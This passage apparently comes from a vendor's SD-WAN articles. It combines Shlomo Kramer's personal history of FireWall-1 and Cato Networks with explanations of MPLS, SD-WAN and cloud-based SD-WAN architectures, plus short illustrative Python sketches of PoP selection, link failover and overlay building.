This brings the cloud “as-a-service” vision to the SD-WAN sector. Servers, storage, network infrastructure, software and security no longer are the enterprises’ problem. Software is distributed across geographically dispersed points-of-presence, each of which is fully-redundant and connected by multiple paths to every other PoP. The organization instantiates, configures and manages their SD-WANs as if they are running on their own dedicated equipment -- but they aren’t.

SDWaaS uses a “thin-edge” architecture to do this. This is a zero-touch appliance at the branch that simply moves packets across secure tunnels into the SD-WAN cloud, MPLS or another transport. The thin edge performs only the tasks that must be done locally. These include optimal PoP selection, bandwidth management, packet loss elimination and dual transport management. This means the edge can run on many different devices and services, such as a software client for mobile devices or an IPsec tunnel from third-party firewalls or cloud services.
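
One of those local tasks, optimal PoP selection, can be sketched in a few lines of Python: probe each candidate PoP and attach to the one with the lowest round-trip time. The PoP names and measured values are invented; a real thin-edge device would use its vendor's own probing and steering logic.

# Hypothetical sketch of optimal PoP selection by a thin-edge device.
POPS = ["pop-frankfurt", "pop-london", "pop-amsterdam"]

def probe_rtt_ms(pop):
    # Stand-in for a real latency probe (e.g. a few timed keepalives to the PoP).
    return {"pop-frankfurt": 18, "pop-london": 31, "pop-amsterdam": 24}[pop]

def pick_pop(pops):
    measurements = {pop: probe_rtt_ms(pop) for pop in pops}
    best = min(measurements, key=measurements.get)
    print(f"RTTs: {measurements} -> attaching to {best}")
    return best

pick_pop(POPS)    # attaches to pop-frankfurt, the lowest-latency PoP in this example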

But beyond the SD-WAN, most edge functions needed to support the branch perimeter are built into SDWaaS. A complete, converged security stack includes NGFW, IPS, and SWG. SD-WAN and network optimization functions also run in the cloud, including routing, optimal path selection and throughput-maximization algorithms. And by moving these functions into the cloud, they're available to secure and improve the experience of users at all SD-WAN nodes -- headquarters, remote branch offices, homeworkers, and, yes, mobile users.

At the Branch, Think SDWaaS, Not MPLS

Simplifying infrastructure is a key to thriving in our data-intensive, cloud-based and highly mobile world. A single network with a single framework for all users and applications makes IT leaner, more agile. It will include all branch offices, large and small, a big change from their traditional second-class status.

Converging networking and security is essential to the story of WAN transformation. And while SD-WAN is a valuable evolution of today’s WAN, SDWaaS goes further and brings a new vision for networking and security to today’s branch offices.


Check Point Software and Cato Networks Co-Founder Shlomo Kramer Shares His Journey: From ‘Firewall-1’ Software to Today’s Firewall as a Service

By: Shlomo Kramer, Check Point Software & Cato Networks Co-Founder

As one of the founders of Check Point Software and more recently Cato Networks, I’m often asked for my opinion on the future of IT in general, and security and networking in particular. Invariably the conversation shifts towards a new networking technology or the response to the latest security threat. In truth, I think the future of the firewall lies in solving an issue we started to address in the past.

FireWall-1, the name of Check Point’s flagship firewall, is a curious name for a product. The product that’s become synonymous with firewalls wasn’t the first firewall. The category already existed when I invented the name and saved that first project file (a Yacc grammar file for the stateful inspection compiler, if you must know). In fact, one of the first things Gil did when we started our market research for Check Point in 1992 was to subscribe to a newly formed firewall mailing list for, well, firewall administrators.

But FireWall-1 was the first firewall to make network security simple. It’s the stroke of simplicity that made FireWall-1. From software to appliances, firewall evolution has largely been catalyzed by simplicity. It’s this same dynamic that three years ago propelled Gur Shatz and me to start Cato Networks and capitalize on the next firewall age, the shift to the cloud.

To better understand why simplicity is so instrumental, join me on a personal 25-year journey of the firewall. You’ll learn some little-known security trivia and develop a better picture of where the firewall, and your security infrastructure, is headed.

The Software Age & Simplicity Revolution

When we started developing FireWall-1, the existing firewalls were complicated beasts. Solutions such as the Raptor Firewall or the Trusted Information Systems Firewall Toolkit (FWTK) relied on heavy professional services. Both came out of corporate America (if I remember correctly, Raptor from DuPont and FWTK from Digital).

The products required ongoing attention. Using new internet applications could mean installing a new proxy server on the firewall. Upgrading an existing application could require simultaneously upgrading the existing proxy servers, or risk breaking the application. No surprise, the solutions were sold to large organizations willing to pay for the extensive customization and professional services required to implement and maintain them.

They say “necessity is the mother of invention” and that was certainly the case for Gil, Marius, and me. We were anything but corporate America. Extensive on-site support, custom implementations, professional services — the normative models wouldn’t work for us sitting in my grandmother’s apartment 10,000 miles away from the market, suffering the sweltering Israeli summer with no air conditioning and only $300,000 in the company bank account.

We needed a different strategy. What we needed was a solution that would be:

  • Simple to use without customer support,
  • Simple to deploy without professional services,
  • Simple to buy from afar, and, above all,
  • Simple enough for three capable developers to build before running out of budget (about 12 months).

To make the firewall simple to use, two elements were key:

  • A stateful and universal inspection machine that could handle any application given the right, lightweight configuration file. No longer was there a need to deploy and update custom proxy servers for each application. In the coming years, when Internet traffic patterns changed to include an ever-growing number of applications, stateful inspection became critical.
  • An intuitive graphical user interface that any sys admin could understand and use almost immediately.

Actually, we didn’t get the UI right the first time around. After a few months of development, we ran a “focus group” with friends who, luckily, were PC developers. In those days, PC developers were much more advanced UI folk than us Sun workstation guys. Our focus group hated the UI, which led us to start all over and develop a PC-like interface that looked like this:

Caption: A screenshot of FireWall-1’s early interface.

 I still think it’s pretty great. By the way, you might notice a host called “Monk” in the rule base. It was one of the two Sun workstations we owned (actually borrowed as a favor from the Israeli distributor of Sun), and named Monk after Thelonious Monk, the American jazz pianist and composer. The other machine was named Dylan. And all of those cool Icons? They were drawn by Marius who doubled as our graphic artist. He worked on a PC.

To make the product simple to deploy, we made a special effort to compress the entire distribution into a single diskette with the install manual printed on the diskette’s label:

Caption: An early FireWall-1 disk. Note the installation instructions on the label.

The last critical point was making the product simple to buy. In a world where the competition sold direct and made a considerable part of their revenues off of professional services, we decided to become a pure channel company and sell exclusively through partners.

We were very lucky to sign up early on with SunSoft, the software arm of the then leading computer manufacturer, Sun Microsystems, and become part of their popular Solstice suite. Sun's distribution know-how and capabilities were critical in the early days. In the pull market that followed, the fact that buying FW-1 through our partners was simple became critical.

Caption: An early FireWall-1 disk packaged as part of Sun’s Solstice suite.

The Appliance Age: Simplicity At Scale

As firewalls became increasingly popular, the workstation form factor became increasingly difficult to maintain. The basic premises of our business — simple to buy, simple to deploy, simple to use — were eroding because of how customers were using the product. It’s one thing when you have a single Internet control point running on a repurposed workstation, but now organizations had distributed hundreds of these firewalls running on all sorts of machines and operating systems. You can imagine the mess.

Moving from shrink-wrapped software to prepackaged appliances seemed like, well, a simple, logical next step. The transition was anything but simple.

There was an existing perimeter appliance already in the market — the router. It made perfect sense to embed the firewall in that appliance, at least that’s what I thought when I signed an OEM agreement with Wellfleet Communications, the then number-two router company (after Cisco, of course). We even had a customer with an amazing 300-node purchase (a large financial institution in NY). One of our leading engineers, Nir Zuk, relocated to Boston to work at the Wellfleet office and support that project.

Caption: Embedding the firewall in a Wellfleet router was good in concept, but the product remained crippled by limitations of the underlying router.

I remember the day I visited Nir. He wasn’t happy at all, spitting and cursing as only Nir can. The hardware and operating system underlying the Wellfleet router were neither powerful enough nor dynamic enough to address the needs of a sophisticated firewall. It was a far cry from developing for the Solaris-based workstation. Work progressed slowly and, in the end, Nir was talented enough to get something basic working, enabling us to implement the 300 router-firewall nodes purchased by the customer. But the product remained crippled by the underlying platform. Overall, the product wasn’t a success.

It became clear that there was a need for a dedicated appliance, and so we started looking around for a platform flexible enough to run a firewall. One of the early platforms we targeted was an appliance from a company called Armon, which made a network monitoring solution based on the RMON standard.

Since the appliance was built to run sophisticated software, we believed it would be a good match for FW-1. The Armon CEO, Yigal Yaakobi, was a big enthusiast of the OEM model, and licensed the box to us to build a dedicated firewall appliance. But Armon had just been bought by SynOptics Communications, the then-leading wiring hub manufacturer, which merged with Wellfleet to form Bay Networks. We needed Bay Networks management buy-in, which meant meeting with Jim Goetz, later the famed investor with Sequoia.

Yigal and I dressed up in our best (and in my case, only) suits and met Jim at a coffee shop in Vegas across from the Interop show. The meeting was not a success. Apparently, Jim did not appreciate my style in clothing and spent most of the meeting criticizing it. And so the future of the firewall suffered a minor setback due to my lack of fashion sense. But the idea apparently stuck, because we would soon meet Jim again in more fortunate circumstances.

Caption: Embedding the firewall in Nokia appliances (pictured is a Nokia IP1220) proved successful.

Anyway, I did not give up. I hired Asheem Chandna (later the famed investor with Greylock) as the vice president of business development and product management, and relocated Nir Zuk to the Bay Area. The two started, among other things, the OEM program for Check Point that yielded the very successful Nokia relationship, which for many years was the basis of Check Point’s line of appliances.

As an epilogue, Nir, Jim and Asheem started a company a few years later called Palo Alto Networks that redefined the network security market, introducing the first modern unified threat protection appliance. And, yes, it was simple to buy, deploy and use, and wonderfully addressed the challenges of the changing traffic patterns it needed to protect.

Caption: Palo Alto redefined the network security market with unified threat protection appliances (shown here is a PA-7000 series appliance).

The Cloud Service: Simplicity For Today’s Business

Firewalls were always in the business of defining the perimeter, but originally we had ambitions to go after the business of the WAN. At Check Point we developed VPN-1 immediately after releasing FireWall-1 (and later merged them into one product suite): the first IPsec-based VPN between gateways, followed by a client VPN version for remote users. The idea was to replace Frame Relay and ATM, the predecessors of MPLS.

Caption: An early VPN-1 disk for running on a Nokia appliance.

Then we developed FloodGate-1 to provide WAN optimization and QoS for the IP VPN network. The goal was to create a platform for a high-quality, Internet-based WAN that did not require dedicated, expensive Frame Relay or ATM connections and would extend beyond physical locations to any type of nomadic (if we use the ’90s term) user.

It failed. MPLS won. People wanted SLA-backed networks to run their mission-critical apps. The Internet was too unpredictable. That was my exit project at Check Point. After I left, the FloodGate-1 effort was sidelined.

I also put this problem aside and started working on bringing firewalls deep into the datacenter of organizations. That took about 12 years and yielded other companies called Imperva and then Incapsula, founded by Gur Shatz, who soon emerged as a true cloud innovator.

In Incapsula, for the first time, the appliance form factor came under attack. The datacenter was by now mostly hosted on a cloud service or even just a good, old, plain hoster. Physical appliances made little sense when you could use a third-party cloud service. Incapsula was a great success (still is) because it took application delivery and security, and matched the cloud challenge with a cloud toolset.

While we were busy with the datacenter firewall it became increasingly clear that the perimeter was dissolving. In a world where most of my apps are third-party Software as a Service (SaaS), most of my data resides on third-party, public clouds, and most of my work is done on mobile devices out of the office, of what use are physical appliances when they’re guarding my now largely empty office?

Organizations had to buy an increasing number of products to protect their SaaS applications, Infrastructure as a Service (IaaS) cloud datacenters, and mobile users on top of their ongoing firewall spend. To make things worse, the many branch locations and small offices that never had a direct breakout to the Internet, and instead just backhauled over MPLS to the company center where the firewall resided, could not work that way anymore. The Internet became a utility. You needed it anywhere, anytime, lots of it, and in a secure way. So all sorts of patches, like MPLS augmentation and secure web gateways, emerged to increase Internet availability to all elements of the organization. Things were very messy at this stage. A far cry from the simple to buy, deploy, and use idea of the past.

Caption: With cloud, you can create one network with one set of security policies for all locations, resources, and users.

When Gur (yep, that guy of Incapsula fame) and I started Cato Networks almost three years ago, we realized the problems of the WAN and the perimeter are interlocked and require a new architecture that would make secure Internet and WAN connectivity available everywhere, anytime, to any part of the organization – a branch office, a data center, a cloud segment, a mobile user. It was like going back 17 years in time to the days of VPN-1 and FloodGate-1 and taking a second run at that problem, but this time in a completely different world driven by cloud and mobility. The key remained the same: bring simplicity to an increasingly complex world.

Caption: Cato addresses a diverse range of SD-WAN use cases.

Following the Incapsula playbook we built a cloud network able to deliver anytime anywhere networking and security services. Think AWS for networking and network security. I believe this is the architecture that 10 years from now will dominate the enterprise WAN.

But it’s not just my belief. After 18 months in the market, hundreds of customers with thousands of branch locations across all verticals now rely on Cato Cloud to connect and secure their corporate networks. They agree with us: Cato is the future of networking.


MPLS vs. SD-WAN vs. Internet vs. Cloud Network. Connectivity, Optimization and Security Options for the ‘Next Generation WAN’

The Wide Area Network (WAN) is the backbone of the business. It ties together the remote locations, headquarters and data centers into an integrated network. Yet, the role of the WAN has evolved in recent years. Beyond physical locations, we now need to provide optimized and secure access to Cloud-based resources for a global and mobile workforce. The existing WAN optimization and security solutions, designed for physical locations and point-to-point architectures, are stretched to support this transformation.

This article discusses the different connectivity, optimization and security options for the ‘Next Generation WAN’ (NG-WAN). The NG-WAN calls for a new architecture to extend the WAN to incorporate the dynamics of cloud and mobility, where the traditional network perimeter is all but gone.

The Wide Area Network (WAN) connects all business locations into a single operating network. Traditionally, WAN design had to consider the secure connectivity of remote offices to a headquarters or a data center which hosted the enterprise applications and databases.


Let’s look at the evolution of the WAN.

First Generation: Legacy WAN Connectivity

Currently, there are two WAN connectivity options, which offer a basic tradeoff between cost, availability and latency:

Option 1: MPLS - SLA-Backed Service at Premium Price

With MPLS, a telecommunication provider provisions two or more business locations with a managed connection and routes traffic between these locations over its private backbone. In theory, since the traffic does not traverse the internet, encryption is optional. Because the connection is managed by the telco end to end, it can commit to availability and latency SLAs. This commitment is expensive and is priced by bandwidth. Enterprises choose MPLS if they need to support applications with stringent uptime and quality-of-service requirements, such as Voice over IP (VoIP).

Headquarters connecting to remote offices via MPLS Premium service

To maximize the usage of MPLS links, WAN optimization equipment is deployed at each end of the line, to prioritize and reduce different types of application traffic. The effectiveness of such optimizations is protocol and application specific (for example, compressed streams benefit less from WAN optimization).

Positives:

  • Latency: Low
  • Availability: High

Concerns:

  • Price: High

Option 2: Internet - Best Effort Service at a Discounted Price

An Internet connection procured from an ISP typically offers abundant last-mile capacity for a low monthly price. An unmanaged internet connection doesn’t have the high-availability and low-latency benefits of MPLS, but it is inexpensive and quick to deploy. IT establishes an encrypted VPN tunnel between the branch office firewall and the headquarters/data center firewall. The connection itself goes through the internet, with no guarantee of service levels, because it is not possible to control the number of carriers or the number of hops a packet has to cross. This can cause unpredictable application behavior due to increased latency and packet loss.

Internet-based connectivity forces customers to deploy and manage branch office security equipment.

Positives:

  • Price: Low

Concerns:

  • Latency: Unknown
  • Availability: Low

Second Generation: Appliance-Based SD-WAN

The cost/performance tradeoff between internet and MPLS gave rise to SD-WAN. SD-WAN uses both MPLS and internet links to handle WAN traffic. Latency-sensitive apps use the MPLS links, while the rest of the traffic uses the internet links. The challenge customers face is to dynamically assign application traffic to the appropriate link.

Readers interested in SD-WANs should read our Complete Guide to SD-WAN article.


SD-WAN: Augmenting MPLS with Internet Links

SD-WAN solutions offer the management capabilities to direct the relevant traffic according to its required class of service, offloading MPLS links and delaying the need to upgrade capacity.

SD-WAN combining MPLS with Internet links

SD-WAN solutions, however, are limited in a few key aspects:

SD-WAN Footprint

Similar to WAN optimization equipment, SD-WAN solutions must have a box deployed at each side of the link.

Connectivity

SD-WAN can’t replace the MPLS link because its internet “leg” is exposed to the unpredictable nature of an unmanaged internet connection (namely, variable latency, packet drops and availability).

Deployment

SD-WAN, like the other WAN connectivity options, is agnostic to the increased role of the internet, Cloud and mobility within the enterprise network. It focuses, for the most part, on optimizing the legacy, physical WAN.

Third Generation: A Cloud-based, Secure SD-WAN

With the rapid migration to Cloud applications (e.g., Office 365), Cloud infrastructure (e.g. Amazon AWS) and a mobile workforce, the classic WAN architecture is severely challenged. It is no longer sufficient to think in terms of physical locations being the heart of the business, and a new cloud-based SD-WAN solution was born. Here is why:

Limited end to end link control for the Cloud

With public cloud applications outside the control of IT, organizations can’t rely on optimizations that require a box at both ends of each link. In addition, Cloud infrastructure (servers and storage), introduces a new production environment that has its own connectivity and security requirements. Existing WAN and Security solutions don’t naturally extend to the new Cloud-based environments.

Limited service and control to mobile users

Securely accessing corporate resources requires mobile users to connect to a branch or HQ firewall VPN, which could be very far from their location. This causes user-experience issues and encourages compliance violations (for example, direct access to Cloud services that bypasses corporate security policy). Ultimately, the mobile workforce is not effectively covered by the WAN.

The Cloud-based, Secure SD-WAN aims to address these challenges. It is based on the following principles:

The Perimeter Moves to the Cloud

The notorious dissolving perimeter is re-established in the Cloud. The Cloud delivers a managed WAN backbone with reduced latency and optimal routing. This ensures the required quality of service for both internal and Cloud-based applications.

The Cloud-Based WAN is “Democratic” and All-Inclusive

All network elements plug into the Cloud WAN with secure tunnels, including physical locations, Cloud resources and mobile users. This ensures all business elements are an integral part of the network instead of being bolted on top of a legacy architecture.

Security is Integrated into the Network

Beyond securing the backbone itself, it is possible to directly secure all traffic (WAN and internet) that crosses the perimeter - without deploying distributed firewalls.

SD-WAN protects businesses from internet attacks

As shown in the example above, the SD-WAN provider acts as a gateway to the internet for the business. Any attempts to gain access to the business network or attacks must pass through the SD-WAN provider's secure network. This not only provides increased levels of security but also off-loads attacks directly to the SD-WAN provider, saving the business considerable bandwidth and resources needed to repel attacks.

Summary

This article compared SD-WAN solutions with Service Provider MPLS, Internet and Cloud Networks. We examined the positives and negatives of MPLS services (guaranteed SLAs), Internet-based WAN solutions (best-effort service), augmenting MPLS with Internet links, and Cloud networks. For more information on SD-WAN, refer to our Complete Guide to SD-WAN networks.


Complete Guide to SD-WAN. Technology Benefits, SD-WAN Security, Management, Mobility, VPNs, Architecture & Comparison with Traditional WANs. SD-WAN Providers Feature Checklist.

SD-WAN is the answer for enterprises and organizations seeking to consolidate network functions and services while at the same time simplifying their WAN infrastructure and its management.

SD-WANs are suitable for any organization regardless of its size and location(s). Forget about managing routers, firewalls or proxies, upgrading internet lines, high-cost WAN links, leased lines (MPLS), filtering incoming traffic, public-facing infrastructure, VPNs and mobile clients. SD-WANs provide all the above and allow managers, administrators and IT staff to manage their WAN infrastructure via an intuitive, easy-to-use GUI, lowering equipment and service contract costs while also minimizing the need for continuous upgrades and other expensive, time-consuming exercises.


The diagram below shows a few of the network and security services that leading global SD-WAN providers, such as Cato Networks, provide to businesses no matter where they are geographically located around the world.

SD-WAN networks offer zero-touch deployment with advanced network security services

Let’s kick off this guide by taking a look at the SD-WAN topics covered:

What is SD-WAN?

Software-Defined Wide Area Network (SD-WAN) is a new architectural approach to building Wide Area Networks (WANs) whereby applications and the network configuration are isolated from the underlying networking services (various types of Internet access or private data services sold by network service providers). As a result, the networking services can be reconfigured, added, or removed without impacting the network. The benefits to such an approach address long-standing concerns with traditional WANs around the cost of bandwidth, time to deploy and reconfigure the WAN and more.

The Problem with Traditional WANs

For years, organizations connected their locations with private data services, namely MultiProtocol Label Switching (MPLS) services. Companies contract with their network service provider to place MPLS routers at each location. Those routers connect with one another or a designated site across the MPLS service. MPLS services are seen as being:

  • Private because all customer traffic is separated from one another.
  • Predictable as the MPLS network is engineered to have very low packet loss
  • Reliable as the carrier stands behind the MPLS with service and support, backing it up contractually with uptime (and reliability) guarantees.

Traditional High-Cost MPLS VPN Networks

As such, MPLS services are expensive (relative to Internet connectivity), in some cases costing 90 percent more than Internet bandwidth. And with bandwidth being so expensive, companies have to be very judicious in their bandwidth usage. Sites are often connected by a single MPLS line, creating a potential single point of failure. Delays from line upgrades are a problem, as lines often lack the necessary excess capacity to accommodate traffic changes or new applications. Finally, new deployments take significantly longer than Internet lines — weeks in some cases, months at the extreme — whereas Internet access can be deployed in days if not minutes (with 4G/LTE).

Organizations accepted MPLS limitations for years for numerous reasons. For too long, the Internet was far too erratic to provide the consistent performance needed by enterprise applications. That’s changed significantly within Internet regions over the past few years. A decade ago, most enterprise traffic stayed on the MPLS network, terminating at a headquarters or datacenter housing the company’s applications. Today, Internet and cloud traffic are the norm, not the exception, often constituting half of the traffic on an MPLS backbone. The net result is that data transmission costs end up consuming a significant portion of an IT department’s annual expenditure on its WAN, with Internet and cloud traffic being a major cause.

How Does SD-WAN Work?

Enter SD-WAN. SD-WAN leverages ubiquitous, inexpensive Internet connections to replace MPLS for much of an organization’s traffic. At a high-level, the SD-WAN separates the applications from the underlying network services. Policies, intelligent routing algorithms, and other technologies in the SD-WAN adapt the network to the application. Depending on implementation, the locations, cloud datacenters, SaaS applications, and mobile users can all be connected into the SD-WAN.

High-Speed Low-Cost SD-WAN with Global SLA Contracts

More specifically, the SD-WAN router sits at the edge of a location’s local network and connects to the network services. Best practices call for at least two connections per location. Hybrid WAN configurations will use an MPLS line and an Internet service, such as fiber, xDSL, cable or 4G/LTE. All-Internet configurations will use two or more Internet services. The SD-WAN routers connect with one another, forming a mesh of encrypted tunnels (the “virtual overlay”) across the underlying network services (the “underlay”), such as cable, xDSL, or 4G/LTE.

Unlike traditional WANs, all lines in an SD-WAN are typically active. The SD-WAN uses Policy-Based Routing (PBR) algorithms and preconfigured application policies to dynamically select the optimum tunnel based on application requirements, business priorities, and real-time network conditions. The SD-WAN is responsible for balancing traffic across the site’s connections. Should there be an outage (a “blackout”) or degradation in the line (a “brownout”), the SD-WAN moves traffic to alternate paths and restores them to initial paths also based on configured policies.
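
A minimal sketch of that blackout/brownout handling is shown below, assuming invented thresholds and link names; real products add continuous probing, hysteresis and per-application behaviour on top of this basic idea.

# Hypothetical sketch of blackout/brownout failover on an active/active link pair.
BROWNOUT_LOSS_PCT = 2.0        # illustrative degradation thresholds
BROWNOUT_LATENCY_MS = 250

def link_state(stats):
    if not stats["up"]:
        return "blackout"
    if stats["loss_pct"] > BROWNOUT_LOSS_PCT or stats["latency_ms"] > BROWNOUT_LATENCY_MS:
        return "brownout"
    return "healthy"

def choose_active(primary, secondary):
    # Stay on the primary while it is healthy; otherwise fail over.
    # A real implementation would also dampen flapping before restoring traffic.
    return primary["name"] if link_state(primary["stats"]) == "healthy" else secondary["name"]

mpls  = {"name": "mpls",  "stats": {"up": True, "loss_pct": 0.1, "latency_ms": 40}}
cable = {"name": "cable", "stats": {"up": True, "loss_pct": 0.5, "latency_ms": 90}}

print(choose_active(mpls, cable))       # mpls (healthy primary)
mpls["stats"]["loss_pct"] = 4.0         # brownout on the MPLS line
print(choose_active(mpls, cable))       # cable (failover)
mpls["stats"]["loss_pct"] = 0.1         # line recovers
print(choose_active(mpls, cable))       # mpls (traffic restored per policy)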

SD-WAN providing alternative connectivity paths during critical line failures

As a result, SD-WAN helps us align our WANs with our business priorities. We can provide every location, user, or resource with just the right connectivity, configured with just the right amount of resiliency. Business-critical locations, such as a data center, can be connected by MPLS and two active, dual-homed connections. Small offices where MPLS may not be available can be connected with one line. Disaster response teams, and other ad-hoc groups, can use 4G/LTE.

Yet regardless of the configuration, all sites continue to be managed by the same set of security policies and routing rules, with the same orchestration engine and from the same management console. In short, we extract maximum value from the underlying WAN resources for optimum Return On Investment (ROI).

SD-WAN Benefits

More specifically, SD-WAN brings benefits to the organization in terms of performance, cost savings, agility, and availability.

SD-WAN Application Performance

Applications have very different networking requirements when it comes to the WAN. Voice is susceptible to jitter and packet loss; bulk data transfers require lots of bandwidth (throughput, actually). Internet routing doesn’t respect those differences. Route selection reflects economic realities between ISPs, not application requirements. Internet providers will dump packets on peered networks or keep packets on their own network even though there are “better” routes available.

SD-WAN lets organizations be smarter in how they route traffic. Policies describe the latency, loss and jitter tolerances of various applications. The SD-WAN routers monitor the latency and loss metrics of their connections. They then use that information and the preconfigured policies to select the optimum path for each application.

SD-WAN Cost Savings and Avoidance

Software-Defined Networking (SDN) benefits may still need to be realized in the Data Centers, but they’re very apparent when SDN is applied to the WAN. The ROI of SD-WAN can be dramatic. Internet bandwidth can cost 70 percent less than MPLS bandwidth depending on region and location.

Operational costs are also reduced. Traditional WANs require advanced engineering and mastering of arcane protocols. SD-WANs do not completely eliminate the need for that expertise by any means. But they do help maximize engineering resources by simplifying deployment and management of branch offices. Policy-driven configuration minimizes the “configuration drift” between branch offices that complicates WAN support. Adding new application services across the WAN without adversely affecting existing services becomes far easier. Availability requirements can be more readily met.

SD-WAN architectures that include advanced security further improve savings. They eliminate security appliances, saving on the costs related to the upgrading, patching, and maintenance of those appliances.

SD-WAN Availability

The availability of a traditional WAN was, more often than not, determined by the uptime of the last mile. Within the core of the network, service providers have plenty of redundancy. It’s in the connection to the remote site where redundancy is more limited.

Many locations will not have redundant connections. Even if there are redundant connections, there’s no guarantee that the physical cabling is fully redundant. The different services may still share some common ducting and cabling, opening the way for a discontinuation of service due to a backhoe severing a line or some other physical plant failure. Running two active connections complicates network engineering. And in the event of a blackout on one connection, failover is rarely fast enough to sustain a session or voice call, for example.

SD-WANs natively improve the availability of locations. Their use of active/active connections builds redundancy into the WAN. By mixing different types of WANs, such as 4G/LTE and fiber, diverse routing becomes easier to guarantee. Should there be a blackout or a brownout, the SD-WAN router automatically switches traffic to the second connection. Depending on implementation, failover can be fast enough to sustain a session; users never realize there’s been a networking issue or link failure.

Agility: Deploying new Sites, Reconfiguring the WAN

SD-WAN allows organizations to respond faster to business conditions. This gets expressed in different ways. Businesses often need to start operations at remote sites quickly or, at least, without extensive delays. Enterprise IT is challenged with deploying networking services and configuring security at remote locations. SD-WAN addresses these problems on several fronts:

Deploying new sites: While provisioning MPLS circuits alone can take up to 90 days, more for high-speed circuits, the Internet circuits used by SD-WAN can be deployed in days, less when considering 4G/LTE connections. While MPLS often required on-site expertise to configure networking equipment, SD-WAN avoids those delays with zero-touch provisioning.

Reconfiguring the WAN: Traditional WAN architectures required the network service provider to change the network, which introduced further delays. If more bandwidth was required at a location, the service provider had to re-provision the line, all of which led to more delay. No wonder Gartner found enterprises to be “...dissatisfied with large incumbent network service providers.” SD-WAN puts enterprises in control of network provisioning. The use of “fatter” Internet pipes means line provisioning is generally not required.

SD-WAN Architecture

There are two basic SD-WAN architectures: edge appliances and cloud-based SD-WAN. Both involve a controller function for pushing out policies and distributing routing information, and a management console for dashboards, reporting and policy configuration. Where they differ is in the location of the virtual overlay and how they provide advanced services.

SD-WAN Architecture - Edge Appliances

With edge appliances, the SD-WAN virtual overlay stretches from location to location. Appliances are installed at each site and, once connected to the Internet, retrieve configuration profiles from the SD-WAN controller. The SD-WAN devices configure themselves and join or construct a virtual overlay with other devices. Each device runs the policy-based routing algorithms needed to steer traffic to the most appropriate link based on application requirements and underlying link quality.
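
The overlay-building step can be pictured with the hypothetical sketch below: each appliance asks the controller for its peer list, and the devices end up with one encrypted tunnel per pair of sites. The site names and the full-mesh choice are illustrative only.

# Hypothetical sketch of edge appliances constructing a full-mesh virtual overlay
# from a controller-supplied peer list.
SITES = ["hq", "branch-1", "branch-2", "branch-3"]

def controller_peer_list(site):
    # The controller tells each site which peers to tunnel to (here: everyone else).
    return [peer for peer in SITES if peer != site]

def build_overlay(sites):
    tunnels = set()
    for site in sites:
        for peer in controller_peer_list(site):
            tunnels.add(tuple(sorted((site, peer))))    # one tunnel per site pair
    return sorted(tunnels)

overlay = build_overlay(SITES)
print(f"{len(overlay)} tunnels for {len(SITES)} sites:")    # n*(n-1)/2 = 6 here
for a, b in overlay:
    print(f"  encrypted tunnel {a} <-> {b}")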

Edge appliance architectures are very familiar to network engineers. It’s been the approach used for years by router vendors, WAN optimization vendors, and more. The approach brings certain known benefits, namely:

  • Incremental WAN evolution — SD-WAN edge appliances integrate with existing enterprise networking and security infrastructure while making the WAN more agile.
  • Transport independence — Edge appliance architectures give customers maximum freedom in choosing network service providers.

At the same time, edge appliance architectures introduce several constraints into the SD-WAN such as:

  • Limited ability to improve Internet performance — SD-WAN edge appliances cannot control the end-to-end routing across the Internet. As such, they remain dependent on MPLS to deliver latency- and loss-sensitive applications, particularly across global connections.
  • Unable to evolve WAN functionality — The limited capacity of the SD-WAN edge appliance restricts the overlay's capabilities. Advanced security functions, such as decrypting traffic or running extensive rule sets, consume significant resources. Taking full advantage of these features can force an unexpected hardware upgrade. It's the same problem that long limited the use of unified threat management (UTM) appliances.
  • Overly site focused — Appliances are well suited for connecting locations, but they do not naturally extend to support cloud datacenters, SaaS applications, and mobile users. There’s no easy way to place an SD-WAN appliance in the cloud. Mobile users are rarely happy with the poor performance that results when having to connect back to an appliance that could be very far away, particularly when traveling.

SD-WAN Architecture - Cloud-Based SD-WAN

With Cloud-based SD-WAN, the virtual overlay is formed between the points of presence (PoPs) of the Cloud SD-WAN service. The PoPs connect to each other across a privately managed backbone. There are appliances at each location, but in contrast to the edge architecture, Cloud-based SD-WAN appliances run “just enough” functionality to send traffic to the nearest PoP. Software in the PoP applies the necessary security and network optimizations before forwarding the traffic along the optimum path to its destination.

Cloud-based SD-WAN is a new approach to networking, but a very familiar one to any IT person. It's the same approach used by AWS, Azure and countless other cloud providers. The architectural benefits include:

  • Thin edge flexibility — Since the edge appliance needs minimal functionality, the software can be implemented across a wider range of endpoints. Client software, for example, can connect mobile devices into the SD-WAN. The same is true for cloud applications and cloud datacenters.
  • Enhanced functionality — By leveraging the resources of the cloud, cloud-based SD-WAN can deliver a broad range of advanced functionality without facing scaling constraints. Network throughput is also improved by carrying traffic over a private cloud backbone rather than the public internet.

At the same time, cloud-based SD-WAN architectures face several constraints including:

  • Education — Converging networking, security, and mobility into the cloud represents a radical transformation in networking. It may require some training for IT professionals to grasp the full implications of the evolution.
  • Service Delivery — Cloud-based SD-WAN should be manageable by the customer to avoid the delays and per-task-pricing associated with managed service offerings from carriers and traditional network service providers.
  • Geographic Footprint — The effectiveness of Cloud-based SD-WAN services rides on the reach of its network. Without a global network, a Cloud-based SD-WAN service cannot fix the Internet’s consistency, latency and packet loss problems, problems that are particularly prevalent between Internet regions.

Cloud-based SD-WAN is fundamentally different from two other similar sounding solutions (see table):

  • Cloud-managed services host the management/orchestration engine in the cloud. The SD-WAN fabric is still constructed from an edge appliance architecture.
  • Cloud-hosted services (also called “cloud-delivered”) move some SD-WAN functionality to the cloud. In addition to running the management/orchestration engine in the cloud, some shared infrastructure among customers, such as gateways to cloud services, will run in the cloud. The SD-WAN fabric continues to be constructed edge-to-edge by edge appliances (and gateways).

By contrast, Cloud-based SD-WAN services move the management/orchestration engine and the SD-WAN fabric into the cloud. Edge appliances (or mobile client software) implement only the critical edge functions needed to connect to the SD-WAN fabric in the cloud. As such, the shared infrastructure includes not only the gateways of a cloud-hosted service but also the full SD-WAN software and the middle-mile transport connecting the PoPs.

CLOUD SD-WAN SERVICES COMPARED

                           Location of Management /    Location of        Use of Shared
                           Orchestration Engine        Virtual Overlay    Infrastructure
Cloud-Managed Services     Cloud                       Appliances         None
Cloud-Hosted Services      Cloud                       Appliances         Partial
Cloud-Based Services       Cloud                       Cloud              Full

SD-WAN Deployment Methods

As we’ve seen, organizations can deploy SD-WANs themselves using SD-WAN edge appliances, in what’s sometimes referred to as a “Do It Yourself” (DIY) deployment, or use cloud-based SD-WAN services.

